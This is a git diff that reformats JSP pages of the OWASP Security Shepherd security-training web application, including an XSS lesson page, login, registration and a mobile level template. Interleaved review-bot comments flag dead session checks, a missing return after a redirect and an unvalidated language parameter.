+ String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
+ String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.top10.failureToRestrictUrlAccess");
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- //Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + ".jsp: tokenCookie Error:" + htmlE.toString());
- }
- // validateSession ensures a valid session, and valid role credentials
- // If tokenCookie == null, then the page is not going to continue loading
- if (Validate.validateSession(ses) && tokenCookie != null) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " Accessed");
+ if (request.getSession() != null)
+ {
+ HttpSession ses = request.getSession();
+ //Getting CSRF Token from client
+ Cookie tokenCookie = null;
+ try
+ {
+ tokenCookie = Validate.getToken(request.getCookies());
+ }
+ catch(Exception htmlE)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME +".jsp: tokenCookie Error:" + htmlE.toString());
+ }
+ // validateSession ensures a valid session, and valid role credentials
+ // If tokenCookie == null, then the page is not going to continue loading
+ if (Validate.validateSession(ses) && tokenCookie != null)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), LEVEL_NAME + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-%>
+ %>
-
- Security Shepherd - <%= translatedLevelName %>
-
-
+
+Security Shepherd - <%= translatedLevelName %>
+
-
-
-
-
-
-
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+ $("#showLesson").click(function(){
+ $('#showLesson').hide("fast", function(){
+ $("#lessonIntro").show("slow");
+ });
+ });
+
+ <% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+ <% } %>
<%
- } else {
- response.sendRedirect("../loggedOutSheep.html");
- }
- } else {
- response.sendRedirect("../loggedOutSheep.html");
- }
+ }
+ else
+ {
+ response.sendRedirect("../loggedOutSheep.html");
+ }
+}
+else
+{
+ response.sendRedirect("../loggedOutSheep.html");
+}
%>
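Review bot: The outer guard `if (request.getSession() != null)` cannot fail, because the no-argument `getSession()` creates a session when the request has none. The final `else { response.sendRedirect("../loggedOutSheep.html"); }` is therefore dead code, and the only real access check is `Validate.validateSession(ses) && tokenCookie != null`. Either drop the outer test or make it meaningful with `HttpSession ses = request.getSession(false);` followed by `if (ses != null)`; the page directive would then also need `session="false"`, since a JSP otherwise creates the session itself. The same construct is in the hunks for zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a.jsp and readyToPlay.jsp.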
diff --git a/src/main/webapp/lessons/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a.jsp b/src/main/webapp/lessons/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a.jsp
index 98c944436..e45ff2308 100644
--- a/src/main/webapp/lessons/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a.jsp
+++ b/src/main/webapp/lessons/zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a.jsp
@@ -1,182 +1,190 @@
<%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
- language="java"
- import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
- errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+ language="java"
+ import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+ errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
<%
- /**
- * This file is part of the Security Shepherd Project.
- *
- * The Security Shepherd project is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * The Security Shepherd project is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with the Security Shepherd project. If not, see .
- */
+ /**
+ * This file is part of the Security Shepherd Project.
+ *
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project. If not, see .
+ */
- final String levelName = "Cross Site Scripting Lesson";
- final String levelHash = "zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a";
+ final String levelName = "Cross Site Scripting Lesson";
+ final String levelHash = "zf8ed52591579339e590e0726c7b24009f3ac54cdff1b81a65db1688d86efb3a";
- //Translation Stuff
- Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
- ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.xss." + levelHash, locale);
- //Used more than once translations
- String translatedLevelName = bundle.getString("title.question.xss");
+ //Translation Stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.lessons.xss." + levelHash, locale);
+ //Used more than once translations
+ String translatedLevelName = bundle.getString("title.question.xss");
- ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
- String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
- String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
- String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.attack.xss");
+ ResourceBundle generic = ResourceBundle.getBundle("i18n.text", locale);
+ String owaspMoreInfo = generic.getString("module.generic.owasp.more.info");
+ String owaspGuideTo = generic.getString("module.generic.owasp.guide.to");
+ String owaspUrlAttack = FileInputProperties.readPropFileClassLoader("/uri.properties", "owasp.attack.xss");
+
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ HttpSession ses = request.getSession();
+ //Getting CSRF Token from client
+ Cookie tokenCookie = null;
+ try
+ {
+ tokenCookie = Validate.getToken(request.getCookies());
+ }
+ catch(Exception htmlE)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ }
+ // validateSession ensures a valid session, and valid role credentials
+ // If tokenCookie == null, then the page is not going to continue loading
+ if (Validate.validateSession(ses) && tokenCookie != null)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ // Getting Session Variables
+ //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- //Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
- }
- // validateSession ensures a valid session, and valid role credentials
- // If tokenCookie == null, then the page is not going to continue loading
- if (Validate.validateSession(ses) && tokenCookie != null) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
- // Getting Session Variables
- //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
-
- String csrfToken = Encode.forHtml(tokenCookie.getValue());
+ String csrfToken = Encode.forHtml(tokenCookie.getValue());
%>
-
- Security Shepherd - <%= translatedLevelName %>
-
-
+
+Security Shepherd - <%= translatedLevelName %>
+
-
-
-
-
-
+
+ <% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+ <% } %>
<%
- } else {
- response.sendRedirect("../loggedOutSheep.html");
- }
- } else {
- response.sendRedirect("../loggedOutSheep.html");
- }
+ }
+ else
+ {
+ response.sendRedirect("../loggedOutSheep.html");
+ }
+}
+else
+{
+ response.sendRedirect("../loggedOutSheep.html");
+}
%>
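Review bot: `String csrfToken = Encode.forHtml(tokenCookie.getValue());` encodes a client-supplied cookie value for HTML text content before the output context is known; the markup that emits `csrfToken` is not visible in this hunk. If the value ends up inside a script block or a quoted attribute, keep the raw value in the variable and encode at the point of output with the matching encoder, for example `<%= Encode.forJavaScript(tokenCookie.getValue()) %>` or `Encode.forHtmlAttribute(...)`. The comment above the assignment says encoding should be performed everywhere, so it is worth stating there which output context this call is meant for.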
diff --git a/src/main/webapp/loggedOutSheep.html b/src/main/webapp/loggedOutSheep.html
index d7d5aa9b9..4d2d8a618 100644
--- a/src/main/webapp/loggedOutSheep.html
+++ b/src/main/webapp/loggedOutSheep.html
@@ -1 +1 @@
-
\ No newline at end of file
+
\ No newline at end of file
diff --git a/src/main/webapp/login.jsp b/src/main/webapp/login.jsp
index 29906cf6c..686169a4a 100644
--- a/src/main/webapp/login.jsp
+++ b/src/main/webapp/login.jsp
@@ -1,222 +1,221 @@
<%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
- language="java"
- import="utils.*, dbProcs.*, java.sql.Connection, org.owasp.encoder.Encode" %>
-<%@ include file="translation.jsp" %>
+ language="java"
+ import="utils.*, dbProcs.*, java.sql.Connection, org.owasp.encoder.Encode"%>
+<%@ include file="translation.jsp"%>
<%
- /**
- * This file is part of the Security Shepherd Project.
- *
- * The Security Shepherd project is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * The Security Shepherd project is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with the Security Shepherd project. If not, see .
- *
- * @author Mark Denihan
- */
+ /**
+ * This file is part of the Security Shepherd Project.
+ *
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project. If not, see .
+ *
+ * @author Mark Denihan
+ */
- HttpSession ses = request.getSession();
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
- "Sombody (" + ses.getAttribute("lang") + ") Conntected to login.jsp ...");
+ HttpSession ses = request.getSession();
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+ "Sombody (" + ses.getAttribute("lang") + ") Conntected to login.jsp ...");
- if (request.getSession() != null) {
- if (ses.getAttribute("loginFailed") == null && ses.getAttribute("registrationSuccess") == null
- && ses.getAttribute("registerError") == null) {
- ses.invalidate();
- ses = request.getSession(true);
- String language = request.getParameter("lang");
- if (language != null) {
- ses.setAttribute("lang", language);
- }
+ if (request.getSession() != null) {
+ if (ses.getAttribute("loginFailed") == null && ses.getAttribute("registrationSuccess") == null
+ && ses.getAttribute("registerError") == null) {
+ ses.invalidate();
+ ses = request.getSession(true);
+ String language = request.getParameter("lang");
+ if (language != null) {
+ ses.setAttribute("lang", language);
+ }
- }
- }
+ }
+ }
- String url = (request.getRequestURL()).toString();
- if (url.contains("login.jsp")) {
- url = url.substring(0, url.lastIndexOf("/") + 1);
- } else {
- response.sendRedirect("login.jsp");
- }
+ String url = (request.getRequestURL()).toString();
+ if (url.contains("login.jsp")) {
+ url = url.substring(0, url.lastIndexOf("/") + 1);
+ } else {
+ response.sendRedirect("login.jsp");
+ }
- String registrationSuccess = new String();
- String loginFailed = new String();
- String registerError = new String();
+ String registrationSuccess = new String();
+ String loginFailed = new String();
+ String registerError = new String();
- if (ses.getAttribute("loginFailed") != null) {
- loginFailed = ses.getAttribute("loginFailed").toString();
- ses.removeAttribute("loginFailed");
- }
+ if (ses.getAttribute("loginFailed") != null) {
+ loginFailed = ses.getAttribute("loginFailed").toString();
+ ses.removeAttribute("loginFailed");
+ }
%>
- OWASP Security Shepherd - Login
+OWASP Security Shepherd - Login
-
-
+
+
-
-
-
-
-
-
Security Shepherd
-
-
-
-
-
-
-
-
-
-
- <%
- if (ScoreboardStatus.isPublicScoreboard()) {
- %>
+
+
+
+
+
+
Security Shepherd
+
+
+
+
+
+
+
+
+
+
+ <%
+ if (ScoreboardStatus.isPublicScoreboard()) {
+ %>
-
+
\ No newline at end of file
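Review bot: `ses.setAttribute("lang", language)` stores the raw `lang` request parameter in the new session without any check, and the session's `lang` value is concatenated into the log message at the top of the scriptlet (`"Sombody (" + ses.getAttribute("lang") + ...`). Whether `ShepherdLogManager.logEvent` neutralises line breaks is not visible here, so validate before storing, e.g. `if (language != null && language.matches("[A-Za-z]{2}(_[A-Za-z]{2})?")) {` (the pattern is a sketch; align it with the locales the project ships). Separately, `response.sendRedirect("login.jsp")` in the `else` branch is not followed by `return;`, so the rest of the page still executes after the redirect is issued.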
diff --git a/src/main/webapp/mobileLevelTemplate.jsp b/src/main/webapp/mobileLevelTemplate.jsp
index 35179c4cf..de0f90e17 100644
--- a/src/main/webapp/mobileLevelTemplate.jsp
+++ b/src/main/webapp/mobileLevelTemplate.jsp
@@ -1,41 +1,45 @@
<%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
- language="java" import="utils.*, org.owasp.encoder.Encode" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+ language="java" import="utils.*, org.owasp.encoder.Encode" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
<%
- //MUST be in English and no Quotes In level Name
- String levelName = "Level Name";
+//MUST be in English and no Quotes In level Name
+String levelName = "Level Name";
//Alphanumeric Only
- String levelHash = "Level Hash";
+String levelHash = "Level Hash";
//Translation Stuff
- Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
- ResourceBundle bundle = ResourceBundle.getBundle("i18n." + levelHash, locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n." + levelHash, locale);
//Used more than once translations
- String i18nLevelName = bundle.getString("title.");
- try {
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- String userName = (String) ses.getAttribute("decyrptedUserName");
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + userName, ses.getAttribute("userName"));
- }
- } catch (Exception e) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed");
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not recover username: " + e.toString());
- }
+String i18nLevelName = bundle.getString("title.");
+try
+{
+ if (request.getSession() != null)
+ {
+ HttpSession ses = request.getSession();
+ String userName = (String) ses.getAttribute("decyrptedUserName");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + userName, ses.getAttribute("userName"));
+ }
+}
+catch (Exception e)
+{
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Could not recover username: " + e.toString());
+}
/**
*
* This file is part of the Security Shepherd Project.
- *
+ *
* The Security Shepherd project is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
- *
+ *
* The Security Shepherd project is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
- *
+ *
* You should have received a copy of the GNU General Public License
* along with the Security Shepherd project. If not, see .
*
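Review bot: The template scriptlet only logs the access; it never calls `Validate.validateSession(ses)` or `Validate.getToken(request.getCookies())` the way the lesson pages in this commit do. A level created by copying the template would therefore render for any request unless its author adds the check. Two lines of the file fall between this hunk and the next and are not shown, so this is inferred from the visible part. If mobile levels are meant to be reachable without a validated session, say so in a comment; otherwise add the gate, or at least a marker such as `// TODO: require Validate.validateSession(ses) && tokenCookie != null before rendering`.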
@@ -44,82 +48,81 @@
%>
-
- Security Shepherd - <%= i18nLevelName %>
-
-
+
+Security Shepherd - <%= i18nLevelName %>
+
-
+
-
-
-
<%= i18nLevelName %>template
-
-
+
+
+
<%= i18nLevelName %>template
+
+
- <%= bundle.getString("paragraph.info.1") %>
-
- <% /* IF you need a form - Present it like this */ %>
- <%
- /*
-
-
-
-
-
-
-
-
Loading...
-
-
-
-
-
-
- */
- %>
-
-
-<% /*If you need to call the Server Do it like this */ %>
-<%
- /*
-
- */
-%>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+ <%= bundle.getString("paragraph.info.1") %>
+
+ <% /* IF you need a form - Present it like this */ %>
+ <%
+ /*
+
+
+
+
+
+
+
+
Loading...
+
+
+
+
+
+
+ */
+ %>
+
+
+ <% /*If you need to call the Server Do it like this */ %>
+ <%
+ /*
+
+ */
+ %>
+ <% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+ <% } %>
diff --git a/src/main/webapp/readyToPlay.jsp b/src/main/webapp/readyToPlay.jsp
index f852edbe9..4d684d0cb 100644
--- a/src/main/webapp/readyToPlay.jsp
+++ b/src/main/webapp/readyToPlay.jsp
@@ -1,71 +1,80 @@
-<%@ page import="org.owasp.encoder.Encode, utils.ShepherdLogManager" %>
+<%@ page import="org.owasp.encoder.Encode, utils.ShepherdLogManager"%>
<%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
- language="java" import="utils.*" errorPage="" %>
-<%@ include file="translation.jsp" %>
+ language="java" import="utils.*" errorPage=""%>
+<%@ include file="translation.jsp"%>
<%
- /**
- * This file assigns the tracking cookie for the exposed server
- *
- * This file is part of the Security Shepherd Project.
- *
- * The Security Shepherd project is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * The Security Shepherd project is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with the Security Shepherd project. If not, see .
- *
- * @author Mark Denihan
- */
- String levelName = new String("ReadyToPlay.jsp");
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- //Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ": tokenCookie Error:" + htmlE.toString());
- }
- // validateSession ensures a valid session, and valid role credentials
- // If tokenCookie == null, then the page is not going to continue loading
- if (Validate.validateSession(ses) && tokenCookie != null) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+/**
+ * This file assigns the tracking cookie for the exposed server
+ *
+ * This file is part of the Security Shepherd Project.
+ *
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project. If not, see .
+ *
+ * @author Mark Denihan
+ */
+ String levelName = new String("ReadyToPlay.jsp");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ HttpSession ses = request.getSession();
+ //Getting CSRF Token from client
+ Cookie tokenCookie = null;
+ try
+ {
+ tokenCookie = Validate.getToken(request.getCookies());
+ }
+ catch(Exception htmlE)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +": tokenCookie Error:" + htmlE.toString());
+ }
+ // validateSession ensures a valid session, and valid role credentials
+ // If tokenCookie == null, then the page is not going to continue loading
+ if (Validate.validateSession(ses) && tokenCookie != null)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
%>
-
-
-
+
+
+
-
-
<%
- } else {
- response.sendRedirect("loggedOutSheep.html");
- }
- } else {
- response.sendRedirect("loggedOutSheep.html");
- }
+ }
+ else
+ {
+ response.sendRedirect("loggedOutSheep.html");
+ }
+}
+else
+{
+ response.sendRedirect("loggedOutSheep.html");
+}
%>
diff --git a/src/main/webapp/register.jsp b/src/main/webapp/register.jsp
index f950c0eff..ff023d195 100644
--- a/src/main/webapp/register.jsp
+++ b/src/main/webapp/register.jsp
@@ -1,271 +1,294 @@
<%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
- language="java" import="utils.*,org.owasp.encoder.Encode" errorPage="" %>
-<%@ include file="translation.jsp" %>
+ language="java" import="utils.*,org.owasp.encoder.Encode" errorPage=""%>
+<%@ include file="translation.jsp"%>
<%
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: register.jsp *************************");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: register.jsp *************************");
/**
* This file is part of the Security Shepherd Project.
- *
+ *
* The Security Shepherd project is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
- *
+ *
* The Security Shepherd project is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
- *
+ *
* You should have received a copy of the GNU General Public License
* along with the Security Shepherd project. If not, see .
- *
+ *
* @author Mark Denihan
*/
- if (OpenRegistration.isEnabled() && LoginMethod.isLogin()) {
- HttpSession ses = request.getSession();
- if (request.getSession() != null) {
- if (ses.getAttribute("errorMessage") == null) {
- ses.invalidate();
- ses = request.getSession(true);
- String language = request.getParameter("lang");
- if (language != null) {
- ses.setAttribute("lang", language);
- }
- }
- if (ses.getAttribute("userName") != null) {
- //Logging Username
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
- }
- }
- String url = (request.getRequestURL()).toString();
- if (url.contains("register.jsp")) {
- url = url.substring(0, url.lastIndexOf("/") + 1);
- } else {
- response.sendRedirect("register.jsp");
- }
+if(OpenRegistration.isEnabled() && LoginMethod.isLogin())
+{
+HttpSession ses = request.getSession();
+if(request.getSession() != null)
+{
+ if(ses.getAttribute("errorMessage") == null)
+ {
+ ses.invalidate();
+ ses = request.getSession(true);
+ String language = request.getParameter("lang");
+ if(language != null){
+ ses.setAttribute("lang", language);
+ }
+ }
+ if(ses.getAttribute("userName") != null)
+ {
+ //Logging Username
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ }
+}
+String url = (request.getRequestURL()).toString();
+if(url.contains("register.jsp"))
+{
+ url = url.substring(0, url.lastIndexOf("/") + 1);
+}
+else
+{
+ response.sendRedirect("register.jsp");
+}
//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
- String csrfToken = Encode.forHtml(Hash.randomString());
- ses.setAttribute("csrfToken", csrfToken);
+String csrfToken = Encode.forHtml(Hash.randomString());
+ses.setAttribute("csrfToken", csrfToken);
- String registrationSuccess = new String();
- String errorMessage = new String();
- String registerError = new String();
- String userName = new String();
- String userAddress = new String();
- if (ses.getAttribute("errorMessage") != null) {
- try {
- errorMessage = Encode.forHtml(ses.getAttribute("errorMessage").toString());
- userName = Encode.forHtmlAttribute(ses.getAttribute("userName").toString());
- userAddress = Encode.forHtmlAttribute(ses.getAttribute("userAddress").toString());
- ses.removeAttribute("userName");
- ses.removeAttribute("userAddress");
- ses.removeAttribute("errorMessage");
- } catch (Exception e) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Register.jsp error");
- }
- }
+String registrationSuccess = new String();
+String errorMessage = new String();
+String registerError = new String();
+String userName = new String();
+String userAddress = new String();
+if(ses.getAttribute("errorMessage") != null)
+{
+ try
+ {
+ errorMessage = Encode.forHtml(ses.getAttribute("errorMessage").toString());
+ userName = Encode.forHtmlAttribute(ses.getAttribute("userName").toString());
+ userAddress = Encode.forHtmlAttribute(ses.getAttribute("userAddress").toString());
+ ses.removeAttribute("userName");
+ ses.removeAttribute("userAddress");
+ ses.removeAttribute("errorMessage");
+ }
+ catch(Exception e)
+ {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Register.jsp error");
+ }
+}
%>
-
+
-
+
-
-
-
-
-
-
Security Shepherd
-
-
-
-
-
-
-
-
-
-
- <%
- if (!errorMessage.isEmpty()) {
- %>
-
- <%=errorMessage%>
-
-
- <%
- }
- %>
-
-
-
-
-
-
-
-
- * :
-
-
-
-
-
-
- * :
-
-
-
-
-
-
- * :
-
-
-
-
-
-
- :
-
-
-
-
-
-
- :
-
-
-
-
+
+
+
+
+
+
Security Shepherd
+
+
+
+
+
+
+
+
+
+
+ <%
+ if(!errorMessage.isEmpty()) {
+ %>
+
+ <%=errorMessage%>
+
+ <%
+ }
+ %>
+
+
+
+
+
+
+
+
+ * :
+
+
+
+
+
+
+ * :
+
+
+
+
+
+
+ * :
+
+
+
+
+
+
+ :
+
+
+
+
+
+
+ :
+
+
+
+
-
-
-
- SHEPHERD DISCLAIMER
-
-
The Security Shepherd project is for educational
- purposes only. Do not attempt to use these techniques without
- authorization. If you are caught engaging in unauthorized
- hacking, most companies will take legal action. Claiming that
- you were doing security research will not protect you.
- Security Shepherd is a safe playground for you to improve
- your web application security skills and only encourages white
- hat or ethical hacking behaviour.
-
-
-
-
-
+
+
+
+ SHEPHERD DISCLAIMER
+
+
The Security Shepherd project is for educational
+ purposes only. Do not attempt to use these techniques without
+ authorization. If you are caught engaging in unauthorized
+ hacking, most companies will take legal action. Claiming that
+ you were doing security research will not protect you.
+ Security Shepherd is a safe playground for you to improve
+ your web application security skills and only encourages white
+ hat or ethical hacking behaviour.
+
+
+
+
+
-
-
-
-
-
-
-
Enrolling Now
-
Please wait as you are enrolled for your Security Shepherd
- account.
-
-
-
-
-
-
-
-
-
-
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+ <% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+ <% } %>
<%
-} else {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Sombody is trying to register (Registration is Closed)");
+ }
+else
+{
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Sombody is trying to register (Registration is Closed)");
%>
New account registration is disabled.
<%
- }
+}
%>
diff --git a/src/main/webapp/scoreboard.jsp b/src/main/webapp/scoreboard.jsp
index 31caab1cc..f7a737cec 100644
--- a/src/main/webapp/scoreboard.jsp
+++ b/src/main/webapp/scoreboard.jsp
@@ -1,336 +1,339 @@
<%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
- language="java"
- import="dbProcs.Getter, utils.*,org.owasp.encoder.Encode" errorPage="" %>
+ language="java"
+ import="dbProcs.Getter, utils.*,org.owasp.encoder.Encode" errorPage=""%>
<%
